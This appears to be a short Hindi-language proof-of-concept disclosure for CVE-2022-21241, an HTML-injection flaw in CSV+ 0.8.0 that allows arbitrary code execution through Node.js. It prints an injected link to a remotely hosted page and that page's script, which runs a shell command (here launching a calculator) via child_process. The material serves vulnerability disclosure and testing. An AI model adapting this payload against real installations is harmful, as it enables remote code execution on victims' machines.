
👻 [PoC] CSV+ 0.8.0 - मनमाना कोड निष्पादन (CVE-2022-21241)
👻 2-क्लिक मनमाना कोड निष्पादन भेद्यता।

CVE-2022-21241
⚠ यह PoC उपयोगकर्ताओं को सचेत करने और उनके स्वयं के CSV+ में भेद्यताओं की जाँच करने के लिए बनाया गया था, और हमलों के लिए इसका उपयोग निषिद्ध है।
निम्नलिखित संस्करण असुरक्षित हैं।
हमलावर Node.js कार्यक्षमता का उपयोग करके मनमाना कोड निष्पादित कर सकते हैं। वे किसी साइट पर दुर्भावनापूर्ण js कोड रखेंगे और CSV+ में HTML इंजेक्शन भेद्यता के साथ इसे a-tags से लिंक करेंगे।

<a href='https://electronooooo.htmlbin.net/xsscalc.html'>click me 👻</a>
https://electronooooo.htmlbin.net/xsscalc.html एक अस्थायी लिंक है।
<!DOCTYPE html>
<html>
<head>
<script>
var cmd = "calc";
require("child_process").exec(cmd);
</script>
</head>
<body>
Hi :)
</body>
</html>